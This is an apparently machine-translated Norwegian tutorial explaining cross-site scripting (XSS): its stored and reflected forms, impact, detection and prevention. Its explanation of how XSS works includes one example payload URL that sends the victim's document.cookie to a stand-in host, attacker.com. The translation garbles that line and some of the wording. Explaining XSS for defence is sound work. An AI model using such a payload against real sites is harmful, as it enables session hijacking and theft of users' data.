✅ Hva er cross site scripting? - Slik fungerer det

Introduksjon til Cross Site Scripting

Introduksjon til Cross Site Scripting

Med det økende antallet webapplikasjoner på Internett har websikkerhet nå blitt et viktig problem. Hacking og stjeling av private data fra brukere er nå vanlig, og det truer dem med å bruke ethvert program. Cross Site Scripting er et av de populære angrepene på websikkerheten til brukere. La oss få litt innsikt i hva scripting på flere sider er.
Cross Site Scripting betegnet som XSS, er et datasikkerhetssårbarhet der angriperen har som mål å legge til noen ondsinnet kode i form av skript til et pålitelig nettsted / webside. Det er et injeksjonsangrep på klientsiden, og det ondsinnede skriptet kjøres i nettleseren til brukeren når han får tilgang til det nettstedet / websiden. Indirekte blir dette nettstedet et medium for å sende den ondsinnede koden til brukeren. Ved å injisere skript angripere omgå DOM (Document Object Model) av sikkerhetsbegrensninger og få tilgang til brukerens følsomme sideinnhold, øktkaker, nettleserhistorikk mesteparten av de private dataene som opprettholdes av nettleseren.
Nettsted som inneholder fora, meldingstavler, nettsider som tillater kommentarer og de som bruker usanitert brukerinput og utdataene som er slik generert er mest utsatt for XSS-angrep. Selv om XSS-angrepene er mulige i VBScript, ActiveX og CSS, er de mest vanlige i Javascript som grunnleggende for de fleste nettopplevelser.

Ulike typer Cross Site Scripting (XSS)

Selv om det ikke er noen spesiell klassifisering av Cross Site Scripting, har noen eksperter klassifisert det i to typer som er omtalt nedenfor i detalj:

Lagrede XSS-angrep :

Lagret XSS er de der det ondsinnede skriptet som er injisert av angriperen blir lagret i databasen og kjøres i nettleseren til brukeren når han prøver å få tilgang til databasen i en eller annen form. Disse er også kjent som vedvarende eller lagret XSS. Dette er et av de mest ødeleggende angrepene og skjer spesielt når nettstedet / websiden tillater kommentarer eller tillater innebygging av HTML-innhold.
Angriperen legger til javascript i kommentaren som blir lagret i databasen, og når brukeren får tilgang til den berørte siden og henter dataene fra databasen som det ondsinnede skriptet kjøres i nettleseren, og den angriperen får uautorisert tilgang til brukerens private data.
For eksempel, på et netthandelsnettsted som Olx som har en uanitert meldingsboks for produktbeskrivelse, legger en angriper som er produktselger det ondsinnede javascriptet i det, og det vil lagres i databasen til nettstedet.
Når kjøperen vil åpne produktbeskrivelsen for å se detaljene i produktet, blir det nå offeret når skriptet kjøres i nettleseren, og alle detaljene til brukeren som nettleseren tillater blir kapret.

Prosedyre XSS-angrep:

Dette er en av de vanligste måtene en angriper kan forårsake et XSS-angrep på brukeren. I prosedyre XSS-angrep målretter angriperen i utgangspunktet offeret ved å sende en e-post, en ondsinnet lenke eller legge ved en streng i søkeresultatet som peker til et pålitelig nettsted, men inneholder den ondsinnede JavaScript-koden.
Hvis et offer klikker på den nettadressen, starter den HTTP-forespørselen, og den sender en forespørsel til den sårbare webapplikasjonen. Forespørselen kommer deretter tilbake til offeret med et svar på innebygd javascript-kode som nettleseren utfører med tanke på at den kommer fra et pålitelig nettsted resulterer i kapring av nettleserens konfidensielle data.
For eksempel er det på et e-handelsnettsted en søkeboks der en bruker kan søke i elementene, og strengen som er skrevet i søkefeltet er synlig i nettadressen til nettstedet når søkeforespørselen sendes til serveren.
Angriperen oppretter en kobling der det ondsinnede skriptet er sammenlagt i URLen og sendt det til offeret via e-post. Når offeret åpner den lenken, blir forespørselen sendt til den skadelige hjemmesiden til angriperen, og alle nettleserdataene til offeret blir kapret og sendt til angriperens system.

Hvordan Cross Site Scripting (XSS) fungerer?

I XSS-sårbarhet (Cross Site Scripting) er hovedmotivet til angriperen å stjele dataene til brukeren ved å kjøre det ondsinnede skriptet i nettleseren som injiseres i nettstedets innhold som brukeren bruker på forskjellige måter.
Når en bruker for eksempel søker etter tekst på et nettsted, sendes forespørselen til serveren i skjemaet:

https://www.abcwebsite.com/search?q=text1

I søkeresultatet returnerer nettstedet resultatet sammen med hva brukeren søkte etter:

Du søkte på: text1

Hvis søkefunksjonaliteten er sårbar for XSS, kan angriperen legge til det ondsinnede skriptet i URLen:

https://www.abcwebsite.com/search= dokumentplassering = https: //attacker.com/log.php? c = '+ kodeURIComponent (document.cookie)

Når offeret klikker på denne lenken, blir det omdirigert til det ondsinnede nettstedet, dvs. https://attacker.com, og all nettleserdata blir direkte sendt til angriperens datamaskin, noe som resulterer i at angriperen stjeler all økt-token / informasjonskapsler.
På denne måten injiserer en angriper det ondsinnede skriptet i URL-en, Attacker kan også lagre det skriptet på serveren som kommer inn under Stored XSS.

Effekten av sikkerhetsproblemer på tvers av nettsteder:

Innvirkningen av Cross Site Scripting varierer mye. Etter å ha utnyttet XSS-sårbarheten, får en angriper full kontroll over offerets nettleser og kan utføre forskjellige handlinger som varierer fra små som å se nettleserhistorikken til katastrofale som å sette inn ormer i datamaskinen.

Noen av handlingene som angriperen kan utføre ved å utnytte XSS-sårbarheten er som følger:

Lekker sensitiv informasjon som brukernavn og passord.
Sette inn ormer på datamaskinen.
Å omdirigere brukeren til et farlig nettsted og tvinge til å utføre noen handlinger
Få tilgang til surfingshistorikken til offeret.
Installasjon av Trojan hesteprogram.
Tving brukeren til å utføre og endre verdiene i applikasjonen ved å få tilgang over

Finne sikkerhetsproblemer på tvers av nettsteder:

XSS-sårbarheter oppstår av to grunner, enten blir ikke inngangen fra brukeren validert før du sender den til serveren, eller utdataene som mottas til nettleseren, er ikke HTML-kodet. Når du husker den katastrofale effekten av XSS-sårbarhet og beskytter brukernes personvern, er det veldig viktig å finne ut om nettapplikasjonen er sårbar for XSS eller ikke.
Selv om XSS er vanskelig å identifisere og fjerne, er den beste måten å sjekke å utføre sikkerhetsgjennomgangen av koden og se etter alle stedene der inndataene fra HTTP-forespørselen kan gjøre sin måte å vise som output i en applikasjon. Bruk av skannerverktøyene for automatisk sårbarhet som inkluderer spesialiserte XSS-skannermoduler for å skanne hele webapplikasjonen, kan også hjelpe med å skanne og finne sårbarhetene i et program.

H ow å forhindre XSS?

XSS er et sårbarhet med kodeinjeksjon, så det er veldig viktig å kode dataene som sendes til serveren og dataene som kommer fra serveren til nettleseren til en bruker.
Datavalidering er også veldig viktig, slik at nettleseren tolker koden uten skadelige kommandoer. Ulike forebyggingsmetoder ble introdusert og holdt dataets validering og koding som en prioritet for at et nettsted skal være sårbart for XSS.

Noen punkter må fokuseres for å forhindre XSS: -

HTTP Trace-støtte på alle webservere skal være slått av da angriperen kan stjele informasjonskapselen og private nettleserdata gjennom et HTTP-sporingssamtaler fra serveren selv om document.cookie er deaktivert i offerets nettleser.
Utviklere skal desinfisere inndataene og skal aldri sende dataene direkte mottatt fra brukeren uten å validere det.
Koblinger bør generelt ikke tillates hvis de ikke begynner med de hviteliste protokollene som HTTP: //, https: // og dermed forhindrer bruk av URI-ordninger som javascript: //

Konklusjon:

XSS-angrep er farlige og kan skade personvernet til brukeren og stjele dataene med mindre den normale brukeren bla gjennom applikasjonen nøye. Så utviklere mens de utvikler applikasjonen, bør følge de strenge sikkerhetsreglene spesielt for både data og server, slik at applikasjonen er minst sårbar for XSS og flere brukere kan stole på den.

Anbefalte artikler

Dette har vært en guide til Hva er Cross Site Scripting ?. Her diskuterer vi forskjellige typer krysssted, arbeid, påvirkning og forebygging av henholdsvis XSS. Du kan også gå gjennom andre foreslåtte artikler for å lære mer -

Slik fungerer JavaScript
Hva er et phishing-angrep?
Hva er et cyberangrep?
HTTP-hurtigbuffer
Hvordan fungerer informasjonskapsler i JavaScript med eksempel?

Kategori:

Programvare utvikling

Hva er cross site scripting? - Slik fungerer det - Effekt og typer krysssted

Introduksjon til Cross Site Scripting

Ulike typer Cross Site Scripting (XSS)

Lagrede XSS-angrep :

Prosedyre XSS-angrep:

Hvordan Cross Site Scripting (XSS) fungerer?

Effekten av sikkerhetsproblemer på tvers av nettsteder:

Finne sikkerhetsproblemer på tvers av nettsteder:

H ow å forhindre XSS?

Konklusjon:

Anbefalte artikler

12 viktige GitHub-intervjuspørsmål og svar (Oppdatert for 2019)

GIT-kommandoer - Grunnleggende til avanserte GIT-kommandoer

Git ReBase vs Merge - Topp 5 sammenligning av Git ReBase vs Merge

Globaliseringseksempel - Topp 7 virkelighetseksempel på globalisering

Topp 10 spørsmål og svar på UI-utviklerintervjuer (Oppdatert for 2019)

Ubuntu vs Windows 10 - Vet de 18 beste nyttige forskjeller

Ubuntu vs OpenSUSE - Lær de 21 fantastiske forskjellene

Ubuntu-alternativer - Topp 6 beste Ubuntu-alternativer fra og med 2019

Elasticity of Demand Eksempel - Topp 4 eksempel på elastisitet av etterspørsel

8 pinlige feil på LinkedIn du bør unngå - edu CBA

Ember JS vs React JS - Lær den 6 viktige sammenligningen

Topp 10 spørsmål om innebygde systemintervjuer (Oppdatert for 2019)

Introduksjon til Cross Site Scripting

Ulike typer Cross Site Scripting (XSS)

Lagrede XSS-angrep :

Prosedyre XSS-angrep:

Hvordan Cross Site Scripting (XSS) fungerer?

Effekten av sikkerhetsproblemer på tvers av nettsteder:

Finne sikkerhetsproblemer på tvers av nettsteder:

H ow å forhindre XSS?

Konklusjon:

Anbefalte artikler

Les Mer